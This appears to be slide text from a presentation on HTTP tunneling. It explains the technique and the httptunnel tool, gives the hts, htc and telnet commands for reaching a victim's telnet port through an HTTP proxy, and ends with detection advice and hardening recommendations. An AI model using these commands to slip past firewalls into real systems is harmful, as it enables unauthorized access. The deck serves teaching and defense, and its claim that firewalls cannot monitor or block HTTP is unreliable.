2. What is Http Tunneling ?
•
HTTP Tunneling is a technique WHICH
communications using various network protocols are
encapsulated using the HTTP protocol,Since HTTP
protocol is not Monitored or can’t be blocked by
Firewall.[:(]
•
The HTTP protocol therefore acts as a wrapper for a
channel that the network protocol being tunneled
uses to communicate.[wikipedia]
3. What is its Use ?
used most often as a means for communication from
network locations with restricted connectivity – most
often behind NATs, firewalls, or proxy servers, and most
often with applications that lack native support for
communication in such conditions of restricted
connectivity. For blocking traffic initiated from outside the
network, or blocking of all network protocols except a
few is a commonly used method to lock down a network
to secure it against internal and external threats.
4. How do ? Implementation Issues
The application/ host opens an HTTP connection to a mediator server,
which acts as a relay of communications to and from the remote host.
if connection is Ok then application then communicates with the mediator
server using HTTP requests BUT encapsulating the actual
communications within those requests.
Mediator server during communication will unwraps the actual data before
forwarding it to the remote host in question.
5. The Attack Explained !!! (HTTP TUNNEL
EXPLOIT)
The httptunnel exploit consists of two
components, the client and the
server portion.
htc, resides on the attacker’s and hts,
resides on the victim’s server
6. The Attack Explained !!! (HTTP TUNNEL
EXPLOIT)
Httptunnel exploits the fact that most
firewalls have a proxy for http by creating a
data tunnel. To utilize the data tunnel,
another service is used to send and
receive data across the established
connection, such as telnet.
7. The Attack Explained !!! (HTTP TUNNEL
EXPLOIT)
use of HTTP PUT and HTTP GET
commands.
All data sent to the victim
machine is done through the PUT command
and data is returned through
the GET command.
8. Exploiting
Once installed on the target system, the
server component,
hts -F localhost:23 8888
htc -F 2323 -P PROXY:8000 VICTIM:8888
Once a successful connection has been established, the attacker can issue
commands to the VICTIM on the telnet port through the HTTP proxy data
tunnel by issuing the following:
telnet localhost 2323 [this was blocked by Firewall]
9. Finding the exploit
Because the exploit uses a legitimate service to transmit information
across the network and Internet, the protocol used does not provide an
indication of an exploit occurring.
The issue to watch for is whether the pattern of the protocol, in this case
HTTP PUT, requests being issued from a source to a destination.
The request packets may be of a smaller and less frequent nature than
normal http proxy traffic to a web site. (seem not easy to find and
trace!)
10. Recommendations
1. Ensure all servers are at the most current patch level to avoid root
compromise.
2. Disable all unnecessary services on servers; use only secure login
services, such as SSH.
3. Disable trust relationships with servers that can be accessed from
firewalls, such as those in a Demilitarized Zone (DMZ).
4. Conduct regular scans of servers on the full port range (1 through
65535).
5. Review firewall logs for unusual web access patterns from systems
that do not normally operate as a web client.
6. Monitor for HTTP GET requests issued from systems that do not
provide web services.